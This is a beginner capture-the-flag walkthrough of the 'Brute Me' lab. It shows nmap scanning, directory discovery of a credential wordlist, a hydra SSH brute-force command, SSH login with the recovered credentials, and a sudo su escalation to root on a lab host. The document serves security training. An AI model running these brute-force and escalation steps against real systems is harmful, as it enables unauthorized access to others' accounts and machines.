Brute Me — A Walkthrough of the Bruteforce Lab by NixSecura

on
Brute Me Lab Walkthrough | NixSecura

Brute Me Lab Walkthrough

This is a detailed walkthrough of the Brute Me lab from Imran at NixSecura. I'll show how I moved from initial scanning to full root access, including enumeration, brute forcing, and privilege escalation.

Step 1: Reconnaissance with Nmap

First thing I did was run a full scan to see what services are up:

nmap -sV -A 192.168.1.22

Host is up (0.0046s latency).
Not shown: 65531 filtered tcp ports (no‑response)
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp‑data
21/tcp open   ftp      vsftpd 2.0.8 or later
22/tcp open   ssh      OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13
80/tcp open   http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: e1Pr0f3ss0r's l3g4cy
MAC Address: 24:B2:B9:47:0E:F5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see:

  • FTP running on port 21
  • SSH on port 22
  • HTTP on port 80

Step 2: Web Enumeration

Visiting http://192.168.1.22 gave me a page titled “e1Pr0f3ss0r's l3g4cy”. Using directory brute forcing (with tools like gobuster), I discovered a file called /creds.disc.

tokyo
berlin
nairobi
rockyou
papel
la-casa
money-heist
nobita
ninja7
ikn0wy0u
don'tbruteme
legacy
crackit
badboy123
anonymous
admin
user123
mr.r0b0t
darlen
travel3r
academy.icorx
b31l@c1a0
caroline
g01df1$h
purple
b3stfr1ends
h3l10fr113nd
D3nv3r
proxy99

This list of credentials looked promising for brute‑forcing FTP/SSH.

Step 3: Brute Forcing SSH & FTP with Hydra

I used hydra to try all combinations. The command was something like:

hydra -L users.txt -P passwords.txt ssh://192.168.1.22

After some attempts, I found valid login:

login: ninja7
password: caroline

The same credentials also worked for FTP.

Step 4: Logging in via SSH

Using:

ssh ninja7@192.168.1.22

Once inside as ninja7, I explored the home directory, collected flags & clues.

Step 5: Privilege Escalation to Root

Next I checked sudo permissions:

sudo ‑l

Turns out ninja7 had privilege to run sudo su. Then I used the same password (caroline) to escalate:

sudo su

Then I confirmed root:

whoami
# output: root

Final Thoughts

This lab reinforced some essential lessons:

  • Weak or bruteforceable credentials can lead to full compromise.
  • Enumerate web‑facing services for hidden files or directories.
  • Privilege escalation often hides in sudo permissions.

Huge thanks to Imran and NixSecura Services for creating a lab that’s beginner friendly yet educational.

Thank You (;